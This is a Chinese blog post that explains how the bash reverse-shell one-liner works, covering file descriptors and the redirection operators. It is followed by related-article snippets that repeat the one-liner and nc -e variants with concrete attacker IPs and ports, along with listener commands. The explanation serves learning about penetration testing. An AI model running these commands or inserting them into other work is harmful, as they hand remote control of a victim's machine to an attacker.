对于反弹shell语句bash命令的理解

最新推荐文章于 2023-10-28 18:52:58 发布
最新推荐文章于 2023-10-28 18:52:58 发布
阅读量736 收藏 1
点赞数
分类专栏: WebSecurity 文章标签: Web安全 bash 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39376697/article/details/88378970
版权

(个人经验,仅供参考,错误之处,敬请谅解)

缘由

  在学习Wen渗透过程中,遇到了“反弹shell” 这个专业名词。于是查询找到了整个反弹shell的过程,但对于其中第一条命令尤其不解.

bash -i >& /dev/tcp/[ip]/[port] 0>&1

经过

  起初如果搜这个bash命令,很难找到这个命令和反弹shell有关,基本都是对于linux 命令的介绍。阅读理解之后,个人大概有一些理解,大体来说有以下几点:

  1. Shell是一个处理用户请求的工具或接口,它负责解释用户输入的命令,调用用户希望使用的程序。
  2. Linux中的shell有多种类型,这其中最常用的几种是Bourne shell(sh)、C shell(csh)和Korn shell(ksh)。
  3. Bourne Again shell,它是Linux操作系统缺省的shell,是Bourne shell的扩展,简称Bash,可以提供如命令补全、命令编辑和命令历史表等功能,有灵活和强大的编程接口,同时又有很友好的用户界面。

  那么知道bash是linux一个解释命令的工具(对计算机进行各项操作),下面就有必要了解后面各种符号的意思。个人也是翻阅了不少的解释,给出相对中和的解释:

文件描述符:

0 - stdin 标准输入
1 - stdout 标准输出
2 - stderr 标准错误输出

>与<符号的使用

>是将标准输出重定向,一个代表新建或者覆盖后面的文件,两个代表向文件中追加信息
<是标准输入重定向

>&与&>的使用

这里有的解释说两种使用结果是一样也有亲自试验结果不一样
个人想强调的是:
如果后面跟文件没有必要使用&>,直接使用>不是更省事。
如果后面是文件描述符,则必须使用>&,因为&是强调后面为文件描述符的作用,又何必纠结两个是否相同。

最后总结下这个命令的具体作用

  1. -i参数实现交互命令
  2. 将标准输入重定向至标准输出,而将标准输出重定向至远程机的端口。
  3. 这样在远程机的命令执行结果都会回显到远程机。(而使用2>&1,标准错误同标准输出都会重定向不适用于此处,因为是在远程机操作)
WihauShe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4497
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 8828
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
Linux反弹shell方式总结
qq_43936524的博客
12-11 827
文章目录bash反弹基础知识指令分析 bash反弹 反弹指令: bash -i >& /dev/tcp/ip/port 0>&1 反弹步骤: 在kail上开启7777侦听: nc -lvp 7777 在靶机上输入反弹指令即可反弹成功 基础知识 linux下有三个标准的文件描述符: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>
带你读懂bash一句话反弹shell
qq_42303523的博客
02-22 1812
需要知道的linux知识 标准输入、标准输出、标准错误 在linux中输入一条命令会打开三个文件:标准输入、标准输出、标准错误。 在任何时候这个进程希望读取东西的时候都会从它的标准输入进行读取,在任何时候这个进程有输出的时候都会写入到标准输出,在任何时候这个进程有错误信息的时候都会写入到标准错误。 重定向 一般情况下,标准输入都是键盘,标准输出和标准错误都是显示器。 所谓的重定向,就是修改标准输入、标准输出、标准错误的读取或写入的对象。 常用的重定向操作符号有以下几个: 命令 说明 comm
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-28 3023
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。
反弹shell常用命令
mirocky的博客
01-15 8356
反弹shell常用命令 1 attacker端的监听——netcat (1) windows环境下下载netcat 下载地址 将如图的nc.exe所在文件夹添加到环境变量 (2) linux环境下下载netcat yum install netcat (3) 安装结束 使用如下命令判断是否安装成功 nc -h 使用如下命令开始监听 nc -lvvp port 2 靶机命令 (1) bash bash一句话为: bash -i >& /dev/tcp/ip/port 0>&a
bash shell命令(一)
01-20
命令上 输入 init 3 命令 切换到dos界面 (文本模式) 输入 init 5命令 切换到图形界面 Shift+Ctrl+N 创建一个新的文件夹,在现有的窗口的新标签中启动一个新的shell...默认bash shell提示符是美元符号( $),这个
列出所有Bash Shell内置命令的方法示例
01-20
内置命令包含在 bash shell 本身里面。我该如何在 Linux / Apple OS X / *BSD / Unix 类操作系统列出所有的内置 bash 命令,而不用去读大篇的 bash 操作说明页? shell 内置命令就是一个命令或一个函数,从 shell ...
bash命令使用详解
01-20
此外,由于bash是由shell执行的,因此它也称为shell脚本。 创建一个shell脚本 我们首先创建一个简单的脚本,将“Hello World !!”输出到控制台。 使用vi命令创建新文件。 $ vi hello.sh 打开编辑器后,按如下所示...
浅析Linux之bash反弹shell原理
01-08
靶机 centos 写入 反弹shell命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是...
bash shell命令(八)
01-20
要列出所有已安装包的可用更新,输入如下命令: yum list updates 如果想对更新列表中的所有包进行更新,只要输入如下命令: yum update 只删除软件包而保留配置文件和数据文件,就用如下命令: yum remove package_...
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell bash -i命令
m0_37638874的博客
09-07 3523
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
各种反弹shell方式
m0_58606546的博客
11-17 2225
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4567
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
反弹shell汇总(超详细)
qq_52173020的博客
05-27 4454
别怕失败.
反弹shell命令大全
G3et的博客
03-21 779
【代码】反弹shell命令大全。
反弹shell
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
花一天时间搞懂反弹shell命令bash -i >& /dev/tcp/${HOST}/${PORT} 0>&1!
最新发布
weixin_53306211的博客
10-28 788
【代码】花一天时间搞懂反弹shell命令
bash反弹shell
03-16
Bash反弹shell是指利用Bash命令解释器执行特定的命令,从而在远程主机上实现一个反向shell,以便攻击者可以在远程主机上执行命令并控制该主机。 具体来说,攻击者可以在本地主机上启动一个监听程序,并在远程主机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值